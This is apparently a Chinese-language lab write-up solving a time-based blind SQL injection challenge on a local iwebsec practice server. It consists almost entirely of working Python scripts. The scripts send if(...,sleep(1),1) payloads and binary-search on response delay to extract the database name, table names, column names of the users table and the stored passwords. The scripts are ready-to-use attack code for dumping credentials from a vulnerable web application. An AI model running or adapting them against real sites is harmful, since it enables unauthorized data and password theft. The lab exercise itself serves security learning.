目录
一、解题过程
(一)观察页面
发现不论输入的payload正确与否,页面输出是一样的,所以不能bool注入
(二)编写脚本逐项获取数据
1.获取数据库名的长度(可不做)
#encoding=utf-8
import requests
import os
import time
url="http://192.168.182.130:8001/sqli/04.php"
def DbLen():
for i in range(1,10):
payload="?id=if(length(database())={},sleep(1),1)--+".format(i)
req_url=url+payload
start_time=time.time()
rep=requests.get(url=req_url)
end_time = time.time()
t = end_time - start_time
if t > 1:
print("DB length is "+str(i))
DbLen()
2.获取数据库名(可不做)
def DbName():
result=""
for i in range(1,8):
l = 32
r = 130
mid = (l + r) >> 1
while (l < r):
payload="?id=if(ord(mid((select database()),{},1))>{},sleep(1),1) --+".format(i,mid)
req_url=url+payload
#print(req_url)
start_time=time.time()
rep=requests.get(url=req_url)
end_time = time.time()
t = end_time - start_time
if t > 1:
l = mid +1
else:
r = mid
mid = (l + r)>>1
result=result+chr(mid)
print("the result is {}".format(result))
DbName()
3.获取表名
def TablesName():
result=""
for i in range(1,50):
l = 32
r = 130
mid = (l + r) >> 1
while (l < r):
payload='''?id=if(ord(mid((select group_concat(table_name)
from information_schema.tables where table_schema=database()),{},1))>{},sleep(1),1) --+'''.format(i,mid)
req_url=url+payload
#print(req_url)
start_time=time.time()
rep=requests.get(url=req_url)
end_time = time.time()
t = end_time - start_time
if t > 1:
l = mid +1
else:
r = mid
mid = (l + r)>>1
result=result+chr(mid)
print("the result is {}".format(result))
TablesName()
4.获取users表的列名
def ColumnsName():
result=""
for i in range(1,30):
l = 32
r = 130
mid = (l + r) >> 1
while (l < r):
payload='''?id=if(ord(mid((select group_concat(column_name)
from information_schema.columns where table_schema=database() and table_name='users'),{},1))>{},sleep(1),1) --+'''.format(i,mid)
req_url=url+payload
#print(req_url)
start_time=time.time()
rep=requests.get(url=req_url)
end_time = time.time()
t = end_time - start_time
if t > 1:
l = mid +1
else:
r = mid
mid = (l + r)>>1
result=result+chr(mid)
print("the result is {}".format(result))
ColumnsName()
5.获取password列的数据
def GetData():
result=""
for i in range(1,50):
l = 32
r = 130
mid = (l + r) >> 1
while (l < r):
payload="?id=if(ord(mid((select group_concat(password) from iwebsec.users),{},1))>{},sleep(1),1) --+".format(i,mid)
req_url=url+payload
#print(req_url)
start_time=time.time()
rep=requests.get(url=req_url)
end_time = time.time()
t = end_time - start_time
if t > 1:
l = mid +1
else:
r = mid
mid = (l + r)>>1
result=result+chr(mid)
print("the result is {}".format(result))
GetData()